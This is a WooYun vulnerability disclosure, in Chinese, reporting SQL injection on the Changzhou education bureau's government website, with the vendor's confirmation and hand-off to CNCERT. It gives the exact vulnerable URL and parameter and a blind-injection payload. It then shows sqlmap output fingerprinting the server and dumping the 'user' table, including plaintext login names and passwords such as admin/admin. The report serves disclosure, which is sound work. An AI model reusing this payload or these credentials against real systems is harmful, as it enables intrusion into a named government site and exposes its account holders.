漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0105550
漏洞标题:常州市教育局政务网存在sql注入漏洞
相关厂商:常州市教育局政务网
漏洞作者: 凌晨的星星
提交时间:2015-04-07 11:48
修复时间:2015-05-25 17:28
公开时间:2015-05-25 17:28
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:11
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-07: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向核心白帽子及相关领域专家公开
2015-04-30: 细节向普通白帽子公开
2015-05-10: 细节向实习白帽子公开
2015-05-25: 细节向公众公开
简要描述:
常州市教育局政务网存在sql注入漏洞
详细说明:
可注入的IE是:
http://jyjnew.czedu.gov.cn/tw/czjwtw04/relfile.asp?pageno=1&fclass_name=%CF%E0%B9%D8%CE%C4%D5%C2&fclass_id=unit&sclass_name=%B3%A3%D6%DD%CA%D0%B5%DA%B6%FE%CA%B5%D1%E9%D0%A1%D1%A7&sclass_id=36
漏洞证明:
identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sclass_name (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageno=1&fclass_name=%CF%E0%B9%D8%CE%C4%D5%C2&fclass_id=unit&sclass_name=%B3%A3%D6%DD%CA%D0%B5%DA%B6%FE%CA%B5%D1%E9%D0%A1%D1%A7' AND 3843=3843 AND 'Hxfg'='Hxfg&sclass_id=36
---
[14:12:21] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2000
web application technology: ASP.NET, ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft Access
[14:12:21] [ERROR] cannot retrieve column names, back-end DBMS is Access
do you want to use common column existence check? [Y/n/q] y
已经爆库,相关表名如下:
Database: Microsoft_Access_masterdb
Table: user
[11 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| admin | numeric |
| author | non-numeric |
| content | non-numeric |
| editor | non-numeric |
| grade | non-numeric |
| id | numeric |
| image | non-numeric |
| login_name | non-numeric |
| login_pwd | non-numeric |
| unit | non-numeric |
| user_id | numeric |
+------------+-------------+
随便一个表,以user_id为例:
Database: Microsoft_Access_masterdb
Table: user
[43 entries]
+----+---------+------+-------+-------+-------+--------------+--------+--------------------------------------------------------------------------------------------------------+-----------+------------+
| id | user_id | unit | admin | image | grade | author | editor | content | login_pwd | login_name |
+----+---------+------+-------+-------+-------+--------------+--------+--------------------------------------------------------------------------------------------------------+-----------+------------+
| 27 | 53 | <blank> | 1 | <blank> | <blank> | U\x10q\\?d5? | <blank> | <P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-INIGNT:beeps;DeaNETOIcTIide>TBccimsmTchahFiidedhcc | admin | admin |
| 29 | 53 | <blank> | 0 | <blank> | <blank> | U\x10q\\?d5? | <blank> | <P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-INIGNT:beeps;DeaNETOIcTIide>TBccimsmTchahFiidedhcc | 191954 | jutw |
| 30 | 53 | <blank> | 0 | <blank> | <blank> | U\x10q\\?d5? | <blank> | <P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-INIGNT:beeps;DeaNETOIcTIide>TBccimsmTchahFiidedhcc | cztvu | cztvu |
| 31 | 53 | <blank> | 0 | <blank> | <blank> | U\x10q\\?d5? | <blank> | <P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-INIGNT:beeps;DeaNETOIcTIide>TBccimsmTchahFiidedhcc | szg | szg |
| 33 | 53 | <blank> | 0 | <blank> | <blank> | U\x10q\\?d5? | <blank> | <P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-INIGNT:beeps;DeaNETOIcTIide>TBccimsmTchahFiidedhcc | QT10 | QTZX |
| 34 | 53 | <blank> | 0 | <blank> | <blank> | U\x10q\\?d5? | <blank> | <P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-INIGNT:beeps;
修复方案:
你们更专业。。。
版权声明:转载请注明来源 凌晨的星星@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-04-10 17:27
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。
最新状态:
暂无